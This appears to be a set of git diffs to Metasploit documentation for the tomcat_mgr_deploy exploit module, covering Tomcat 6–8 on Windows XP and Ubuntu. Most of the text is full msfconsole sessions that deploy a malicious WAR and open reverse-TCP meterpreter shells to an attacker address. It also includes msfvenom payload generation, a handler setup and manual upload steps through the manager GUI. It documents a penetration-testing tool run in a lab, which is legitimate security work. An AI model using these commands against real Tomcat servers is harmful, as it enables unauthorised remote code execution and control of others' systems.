+    <user username="tomcat" password="tomcat" roles="manager-script"/>
+    ```
+
 2. Restart Tomcat: `sudo service tomcat7 restart`
   1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
 ` as opposed to `403 Access Denied`
 3. Exploit:
-```
-msf > use exploit/multi/http/tomcat_mgr_deploy 
-msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
-rhost => 192.168.2.118
-msf exploit(tomcat_mgr_deploy) > set rport 8087
-rport => 8087
-msf exploit(tomcat_mgr_deploy) > set target 3
-target => 3
-msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
-payload => linux/x86/mettle/reverse_tcp
-msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
-lhost => 192.168.2.117
-msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
-HttpUsername => tomcat
-msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
-HttpPassword => tomcat
-msf exploit(tomcat_mgr_deploy) > set verbose true
-verbose => true
-msf exploit(tomcat_mgr_deploy) > exploit
-msf exploit(tomcat_mgr_deploy) > set path /manager/text
-path => /manager/text
-msf exploit(tomcat_mgr_deploy) > exploit
 
-[*] Started reverse TCP handler on 192.168.2.117:4444 
-[*] Using manually select target "Linux x86"
-[*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ...
-[!] No active DB -- Credential data will not be saved!
-[*] Executing /9QymzSGGU0H4e/Mfz7dGecAsKTjSxfZgBv.jsp...
-[*] Undeploying 9QymzSGGU0H4e ...
-[*] Transmitting intermediate stager...(106 bytes)
-[*] Sending stage (335800 bytes) to 192.168.2.118
-[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500
+    ```
+    msf > use exploit/multi/http/tomcat_mgr_deploy 
+    msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
+    rhost => 192.168.2.118
+    msf exploit(tomcat_mgr_deploy) > set rport 8087
+    rport => 8087
+    msf exploit(tomcat_mgr_deploy) > set target 3
+    target => 3
+    msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
+    payload => linux/x86/mettle/reverse_tcp
+    msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
+    HttpUsername => tomcat
+    msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
+    HttpPassword => tomcat
+    msf exploit(tomcat_mgr_deploy) > set verbose true
+    verbose => true
+    msf exploit(tomcat_mgr_deploy) > exploit
+    msf exploit(tomcat_mgr_deploy) > set path /manager/text
+    path => /manager/text
+    msf exploit(tomcat_mgr_deploy) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Using manually select target "Linux x86"
+    [*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ...
+    [!] No active DB -- Credential data will not be saved!
+    [*] Executing /9QymzSGGU0H4e/Mfz7dGecAsKTjSxfZgBv.jsp...
+    [*] Undeploying 9QymzSGGU0H4e ...
+    [*] Transmitting intermediate stager...(106 bytes)
+    [*] Sending stage (335800 bytes) to 192.168.2.118
+    [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500
+    
+    meterpreter > sysinfo
+    Computer     : 192.168.2.118
+    OS           : Ubuntu 16.04 (Linux 4.4.0-21-generic)
+    Architecture : x64
+    Meterpreter  : x86/linux
+    ```
 
-meterpreter > sysinfo
-Computer     : 192.168.2.118
-OS           : Ubuntu 16.04 (Linux 4.4.0-21-generic)
-Architecture : x64
-Meterpreter  : x86/linux
-```
 #### gui interface
 Attempted to get the the GUI one to work, I wasn't able to.  I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`.  However, my attempts were unsuccessful.
 
@@ -197,51 +307,104 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
 
 #### text/script interface
 1. Edit `/etc/tomcat8/tomcat-users.xml` to add:
-```
-<role rolename="manager-script"/>
-<user username="tomcat" password="tomcat" roles="manager-script"/>
-```
+  ```
+  <role rolename="manager-script"/>
+  <user username="tomcat" password="tomcat" roles="manager-script"/>
+  ```
 2. Restart tomcat: `sudo service tomcat8 restart`
   1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
 ` as opposed to `403 Access Denied`
 3. Exploit:
-```
-msf > use exploit/multi/http/tomcat_mgr_deploy 
-msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
-rhost => 192.168.2.118
-msf exploit(tomcat_mgr_deploy) > set rport 8088
-rport => 8088
-msf exploit(tomcat_mgr_deploy) > set target 3
-target => 3
-msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
-payload => linux/x86/mettle/reverse_tcp
-msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
-lhost => 192.168.2.117
-msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
-HttpUsername => tomcat
-msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
-HttpPassword => tomcat
-msf exploit(tomcat_mgr_deploy) > set verbose true
-verbose => true
-msf exploit(tomcat_mgr_deploy) > set path /manager/text
-path => /manager/text
-msf exploit(tomcat_mgr_deploy) > exploit
-
-[*] Started reverse TCP handler on 192.168.2.117:4444 
-[*] Using manually select target "Linux x86"
-[*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ...
-[!] No active DB -- Credential data will not be saved!
-[*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp...
-[*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ...
-[*] Transmitting intermediate stager...(106 bytes)
-[*] Sending stage (335800 bytes) to 192.168.2.118
-[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500
-
-meterpreter > sysinfo
-Computer     : 192.168.2.118
-OS           : Ubuntu 16.04 (Linux 4.4.0-59-generic)
-Architecture : x64
-Meterpreter  : x86/linux
-```
+    ```
+    msf > use exploit/multi/http/tomcat_mgr_deploy 
+    msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
+    rhost => 192.168.2.118
+    msf exploit(tomcat_mgr_deploy) > set rport 8088
+    rport => 8088
+    msf exploit(tomcat_mgr_deploy) > set target 3
+    target => 3
+    msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
+    payload => linux/x86/mettle/reverse_tcp
+    msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
+    HttpUsername => tomcat
+    msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
+    HttpPassword => tomcat
+    msf exploit(tomcat_mgr_deploy) > set verbose true
+    verbose => true
+    msf exploit(tomcat_mgr_deploy) > set path /manager/text
+    path => /manager/text
+    msf exploit(tomcat_mgr_deploy) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Using manually select target "Linux x86"
+    [*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ...
+    [!] No active DB -- Credential data will not be saved!
+    [*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp...
+    [*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ...
+    [*] Transmitting intermediate stager...(106 bytes)
+    [*] Sending stage (335800 bytes) to 192.168.2.118
+    [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500
+    
+    meterpreter > sysinfo
+    Computer     : 192.168.2.118
+    OS           : Ubuntu 16.04 (Linux 4.4.0-59-generic)
+    Architecture : x64
+    Meterpreter  : x86/linux
+    ```
 #### gui interface
 Attempted to get the the GUI one to work, I wasn't able to.  I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`.  However, my attempts were unsuccessful.
+
+
+# Manual Exploitation
+
+## Create payload
+This was performed on Windows XP with the following permissions as the user that was used to login:
+Tomcat 6.0.48: manager
+Tomcat 7.0.73: manager-gui
+Tomcat 8.0.39: manager-gui
+
+```
+/metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war
+Payload size: 6072 bytes
+Final size of war file: 6072 bytes
+Saved as: meterp.war
+```
+## Setup Handler
+```
+msf > use exploit/multi/handler 
+msf exploit(handler) > set payload java/meterpreter/reverse_tcp 
+payload => java/meterpreter/reverse_tcp
+msf exploit(handler) > set lhost 192.168.2.117
+lhost => 192.168.2.117
+msf exploit(handler) > set lport 7777
+lport => 7777
+msf exploit(handler) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:7777 
+[*] Starting the payload handler...
+```
+## Deploy
+1. With a web browser, browse to `http://<ip>:<port>/manager/html`
+2. Enter credentials (no default)
+3. Under `Deploy` > `WAR file to deploy`, click browse to select `meterp.war`, click `Deploy`
+4. `meterp` should now be listed under `Applications`, meaning it was successfully deployed.
+5. Either click the link for `/meterp` or browse to `http://<ip>:<port>/meterp/`
+
+## Callback
+After browsing to that page, code execution will happen, and your callback will hit.
+```
+[*] Starting the payload handler...
+[*] Sending stage (49409 bytes) to 192.168.2.108
+[*] Meterpreter session 1 opened (192.168.2.117:7777 -> 192.168.2.108:1704) at 2017-01-14 14:53:37 -0500
+
+meterpreter > sysinfo
+Computer    : winxp
+OS          : Windows XP 5.1 (x86)
+Meterpreter : java/windows
+```
+
+## Cleanup
+
+This will NOT remove the meterpreter from Tomcat, click `Undeploy` within the `Application` list to remove `meterp` from Tomcat.

--- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
+++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
@@ -1,0 +1,241 @@
+# Documentation Format
+This documentation is slightly different from the standard module documentation due to the variation in variables/privileges/versions that can affect how exploitation happens.
+This documentation is broken down by OS, Tomcat version, then privilege to show exploitation at each way.
+
+## Windows (xp sp2)
+### Tomcat 7 (6.0.48)
+#### Setup
+
+1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe)
+
+The install was default, other than adding a user during install.  No other options were changed.
+Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
+So the /manager/html page was visible, but deploying from there wasn't possible.
+
+#### text/script interface
+### Tomcat 7 (7.0.73)
+#### Setup
+
+1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+2. Download and install [Tomcat7](http://apache.osuosl.org/tomcat/tomcat-7/v7.0.73/bin/apache-tomcat-7.0.73.exe)
+
+The install was default, other than adding a user during install.  No other options were changed.
+Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
+So the /manager/html page was visible, but deploying from there wasn't possible.
+
+#### text/script interface
+
+### Tomcat 8 (8.0.39)
+#### Setup
+
+1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+2. Download and install [Tomcat8](http://apache.osuosl.org/tomcat/tomcat-8/v8.0.39/bin/apache-tomcat-8.0.39.exe)
+
+The install was default, other than adding a user during install.  No other options were changed.
+Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
+So the /manager/html page was visible, but deploying from there wasn't possible.
+
+#### text/script interface
+`C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml`
+
+msf > use exploit/multi/http/tomcat_mgr_deploy 
+msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
+rhost => 192.168.2.108
+msf exploit(tomcat_mgr_deploy) > set rport 8088
+rport => 8088
+msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp 
+payload => java/meterpreter/reverse_tcp
+msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
+lhost => 192.168.2.117
+msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
+HttpPassword => tomcat
+msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
+HttpUsername => tomcat
+msf exploit(tomcat_mgr_deploy) > set target 1
+target => 1
+msf exploit(tomcat_mgr_deploy) > exploit
+msf exploit(tomcat_mgr_deploy) > set path /manager/text
+path => /manager/text
+msf exploit(tomcat_mgr_deploy) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Using manually select target "Java Universal"
+[*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ...
+[*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp...
+[*] Undeploying c6TYmkd8YAe8LqKQhSCr ...
+[*] Sending stage (49409 bytes) to 192.168.2.108
+[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500
+
+meterpreter > sysinfo
+Computer    : winxp
+OS          : Windows XP 5.1 (x86)
+Meterpreter : java/windows
+```
+
+
+## Linux
+### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit
+#### Setup
+```
+sudo apt-get install tomcat6 tomcat6-admin
+```
+#### Exploit
+
+edit `/etc/tomcat6/tomcat-users.xml` to add the following:
+```
+<role rolename="manager"/>
+<user username="tomcat" password="tomcat" roles="manager"/>
+```
+Restart tomcat: `sudo service tomcat6 restart`
+
+```
+msf > use exploit/multi/http/tomcat_mgr_deploy 
+msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156
+rhost => 192.168.2.156
+msf exploit(tomcat_mgr_deploy) > set rport 8080
+rport => 8080
+msf exploit(tomcat_mgr_deploy) > set verbose true
+verbose => true
+msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
+HttpUsername => tomcat
+msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
+HttpPassword => tomcat
+msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
+payload => linux/x86/mettle/reverse_tcp
+msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
+lhost => 192.168.2.117
+msf exploit(tomcat_mgr_deploy) > set target 3
+target => 3
+msf exploit(tomcat_mgr_deploy) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Using manually select target "Linux x86"
+[*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ...
+[!] No active DB -- Credential data will not be saved!
+[*] Executing /9bj4IYa66cSpdK/g3Yxbv3.jsp...
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (335800 bytes) to 192.168.2.156
+[*] Undeploying 9bj4IYa66cSpdK ...
+[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500
+
+meterpreter > sysinfo
+Computer     : Ubuntu14.04
+OS           : Ubuntu 14.04 (Linux 4.2.0-27-generic)
+Architecture : x64
+Meterpreter  : x86/linux
+```
+
+### Tomcat7 (7.0.68) - Ubuntu server 16.04 64bit
+Of note, as of Tomcat 7, the permission role 'manager' has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
+#### Setup
+1. Tomcat 7: `apt-get install tomcat7 tomcat7-admin`
+
+#### text/script interface
+edit `/etc/tomcat7/tomcat-users.xml` to add:
+```
+<role rolename="manager-script"/>
+<user username="tomcat" password="tomcat" roles="manager-script"/>
+```
+Restart tomcat. `sudo service tomcat7 restart` (or tomcat8)
+To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
+` as opposed to `403 Access Denied`
+
+```
+msf > use exploit/multi/http/tomcat_mgr_deploy 
+msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
+rhost => 192.168.2.118
+msf exploit(tomcat_mgr_deploy) > set rport 8087
+rport => 8087
+msf exploit(tomcat_mgr_deploy) > set target 3
+target => 3
+msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
+payload => linux/x86/mettle/reverse_tcp
+msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
+lhost => 192.168.2.117
+msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
+HttpUsername => tomcat
+msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
+HttpPassword => tomcat
+msf exploit(tomcat_mgr_deploy) > set verbose true
+verbose => true
+msf exploit(tomcat_mgr_deploy) > exploit
+msf exploit(tomcat_mgr_deploy) > set path /manager/text
+path => /manager/text
+msf exploit(tomcat_mgr_deploy) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Using manually select target "Linux x86"
+[*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ...
+[!] No active DB -- Credential data will not be saved!
+[*] Executing /9QymzSGGU0H4e/Mfz7dGecAsKTjSxfZgBv.jsp...
+[*] Undeploying 9QymzSGGU0H4e ...
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (335800 bytes) to 192.168.2.118
+[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500
+
+meterpreter > sysinfo
+Computer     : 192.168.2.118
+OS           : Ubuntu 16.04 (Linux 4.4.0-21-generic)
+Architecture : x64
+Meterpreter  : x86/linux
+```
+#### gui interface
+Attempted to get the the GUI one to work, I wasn't able to.  I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`.  However, my attempts were unsuccessful.
+
+### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit
+Of note, as of 7, the permission role 'manager' has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
+#### Setup
+1. `apt-get install tomcat8 tomcat8-admin`
+
+#### text/script interface
+edit `/etc/tomcat8/tomcat-users.xml` to add:
+```
+<role rolename="manager-script"/>
+<user username="tomcat" password="tomcat" roles="manager-script"/>
+```
+Restart tomcat: `sudo service tomcat8 restart`
+To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
+` as opposed to `403 Access Denied`
+
+```
+msf > use exploit/multi/http/tomcat_mgr_deploy 
+msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
+rhost => 192.168.2.118
+msf exploit(tomcat_mgr_deploy) > set rport 8088
+rport => 8088
+msf exploit(tomcat_mgr_deploy) > set target 3
+target => 3
+msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
+payload => linux/x86/mettle/reverse_tcp
+msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
+lhost => 192.168.2.117
+msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
+HttpUsername => tomcat
+msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
+HttpPassword => tomcat
+msf exploit(tomcat_mgr_deploy) > set verbose true
+verbose => true
+msf exploit(tomcat_mgr_deploy) > set path /manager/text
+path => /manager/text
+msf exploit(tomcat_mgr_deploy) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Using manually select target "Linux x86"
+[*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ...
+[!] No active DB -- Credential data will not be saved!
+[*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp...
+[*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ...
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (335800 bytes) to 192.168.2.118
+[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500
+
+meterpreter > sysinfo
+Computer     : 192.168.2.118
+OS           : Ubuntu 16.04 (Linux 4.4.0-59-generic)
+Architecture : x64
+Meterpreter  : x86/linux
+```
+#### gui interface
+Attempted to get the the GUI one to work, I wasn't able to.  I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`.  However, my attempts were unsuccessful.
+

--- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
+++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
@@ -15,7 +15,7 @@ It should be stated outright that the exploit does NOT undeploy the shellcode fr
 The install was default, other than adding a user during install.  No other options were changed.  The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax.
 For this exploitation, it was changed to simply `manager`.
 
-#### text/script Interface Exploitation
+#### Exploitation
 
 1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xml` to add the following under the `<tomcat-users>` line:
 
@@ -48,6 +48,8 @@ For this exploitation, it was changed to simply `manager`.
     rport => 8086
     msf exploit(tomcat_mgr_deploy) > set path /manager
     path => /manager
+    msf exploit(tomcat_mgr_deploy) > check
+    [*] 192.168.2.108:8086 The target appears to be vulnerable.
     msf exploit(tomcat_mgr_deploy) > exploit
     
     [*] Started reverse TCP handler on 192.168.2.117:4444 
@@ -107,14 +109,12 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
     lhost => 192.168.2.117
     msf exploit(tomcat_mgr_deploy) > set rport 8087
     rport => 8087
-    msf exploit(tomcat_mgr_deploy) > set payload java/
-    set payload java/meterpreter/bind_tcp       set payload java/meterpreter/reverse_tcp    set payload java/shell_reverse_tcp
-    set payload java/meterpreter/reverse_http   set payload java/shell/bind_tcp             
-    set payload java/meterpreter/reverse_https  set payload java/shell/reverse_tcp          
     msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp 
     payload => java/meterpreter/reverse_tcp
     msf exploit(tomcat_mgr_deploy) > set target 1
     target => 1
+    msf exploit(tomcat_mgr_deploy) > check
+    [*] 192.168.2.108:8087 The target appears to be vulnerable.
     msf exploit(tomcat_mgr_deploy) > exploit
     
     [*] Started reverse TCP handler on 192.168.2.117:4444 
@@ -131,6 +131,9 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
     OS          : Windows XP 5.1 (x86)
     Meterpreter : java/windows
     ```
+
+#### gui Interface
+The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located.  [Manual exploitation is possible](#manual-exploitation)
 
 ### Tomcat 8 (8.0.39)
 Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
@@ -191,6 +194,9 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
     OS          : Windows XP 5.1 (x86)
     Meterpreter : java/windows
     ```
+
+#### gui Interface
+The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located.  [Manual exploitation is possible](#manual-exploitation)
 
 ## Linux
 
@@ -312,7 +318,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
     ```
 
 #### gui Interface
-The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful.  [Manual exploitation is possible](#manual-exploitation)
+The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located.  [Manual exploitation is possible](#manual-exploitation)
 
 ### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit
 Of note, as of 7, the permission role 'manager' has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
@@ -376,7 +382,7 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
     ```
 
 #### gui Interface
-The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful.  [Manual exploitation is possible](#manual-exploitation)
+The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located.  [Manual exploitation is possible](#manual-exploitation)
 
 # Manual Exploitation
 
@@ -420,6 +426,7 @@ msf exploit(handler) > exploit
 
 ## Callback
 After browsing to that page, code execution will happen, and your callback will hit.
+
 ```
 [*] Starting the payload handler...
 [*] Sending stage (49409 bytes) to 192.168.2.108

--- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
+++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
@@ -3,7 +3,10 @@ This documentation is slightly different from the standard module documentation 
 This documentation is broken down by OS, Tomcat version, then privilege to show exploitation in each variation.
 
 # Cleanup
-It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat.  This must be done [manually](#manual-cleanup).
+It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat.  This can be done [manually](#manual-cleanup).
+
+# tomcat_mgr_upload
+This module is VERY similar to `exploit/multi/http/tomcat_mgr_upload`, the main difference is this uses a `PUT` HTTP request, instead of going through a `POST` HTTP request through the GUI.
 
 ## Windows (xp sp2)
 ### Tomcat 6 (6.0.48)
@@ -77,8 +80,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
 2. Download and install [Tomcat7](http://apache.osuosl.org/tomcat/tomcat-7/v7.0.73/bin/apache-tomcat-7.0.73.exe)
 
 The install was default, other than adding a user during install.  No other options were changed.
-Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
-So the `/manager/html` page was visible, but deploying from there wasn't possible.
+Of note, the user was given `manager-gui` permissions by default.
 
 #### text/script Interface Exploitation
 
@@ -132,9 +134,6 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
     Meterpreter : java/windows
     ```
 
-#### gui Interface
-The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located.  [Manual exploitation is possible](#manual-exploitation)
-
 ### Tomcat 8 (8.0.39)
 Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
 
@@ -144,8 +143,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
 2. Download and install [Tomcat8](http://apache.osuosl.org/tomcat/tomcat-8/v8.0.39/bin/apache-tomcat-8.0.39.exe)
 
 The install was default, other than adding a user during install.  No other options were changed.
-Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
-So the `/manager/html` page was visible, but deploying from there wasn't possible.
+Of note, the user was given `manager-gui` permissions by default.
 
 #### text/script Interface Exploitation
 
@@ -194,9 +192,6 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
     OS          : Windows XP 5.1 (x86)
     Meterpreter : java/windows
     ```
-
-#### gui Interface
-The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located.  [Manual exploitation is possible](#manual-exploitation)
 
 ## Linux
 
@@ -317,9 +312,6 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
     Meterpreter  : x86/linux
     ```
 
-#### gui Interface
-The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located.  [Manual exploitation is possible](#manual-exploitation)
-
 ### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit
 Of note, as of 7, the permission role 'manager' has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
 
@@ -381,63 +373,6 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
     Meterpreter  : x86/linux
     ```
 
-#### gui Interface
-The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located.  [Manual exploitation is possible](#manual-exploitation)
-
-# Manual Exploitation
-
-## Create payload
-This was performed on Windows XP with the following permissions as the user that was used to login:
-
-* Tomcat 6.0.48: `manager`
-* Tomcat 7.0.73: `manager-gui`
-* Tomcat 8.0.39: `manager-gui`
-
-```
-/metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war
-Payload size: 6072 bytes
-Final size of war file: 6072 bytes
-Saved as: meterp.war
-```
-
-## Setup Handler
-
-```
-msf > use exploit/multi/handler 
-msf exploit(handler) > set payload java/meterpreter/reverse_tcp 
-payload => java/meterpreter/reverse_tcp
-msf exploit(handler) > set lhost 192.168.2.117
-lhost => 192.168.2.117
-msf exploit(handler) > set lport 7777
-lport => 7777
-msf exploit(handler) > exploit
-
-[*] Started reverse TCP handler on 192.168.2.117:7777 
-[*] Starting the payload handler...
-```
-
-## Deploy
-
-1. With a web browser, browse to `http://<ip>:<port>/manager/html`
-2. Enter credentials (no default)
-3. Under `Deploy` > `WAR file to deploy`, click browse to select `meterp.war`, click `Deploy`
-4. `meterp` should now be listed under `Applications`, meaning it was successfully deployed.
-5. Either click the link for `/meterp` or browse to `http://<ip>:<port>/meterp/`
-
-## Callback
-After browsing to that page, code execution will happen, and your callback will hit.
-
-```
-[*] Starting the payload handler...
-[*] Sending stage (49409 bytes) to 192.168.2.108
-[*] Meterpreter session 1 opened (192.168.2.117:7777 -> 192.168.2.108:1704) at 2017-01-14 14:53:37 -0500
-
-meterpreter > sysinfo
-Computer    : winxp
-OS          : Windows XP 5.1 (x86)
-Meterpreter : java/windows
-```
-
 ## Manual Cleanup
 
-This will NOT remove the meterpreter from Tomcat, click `Undeploy` within the `Application` list to remove `meterp` from Tomcat.
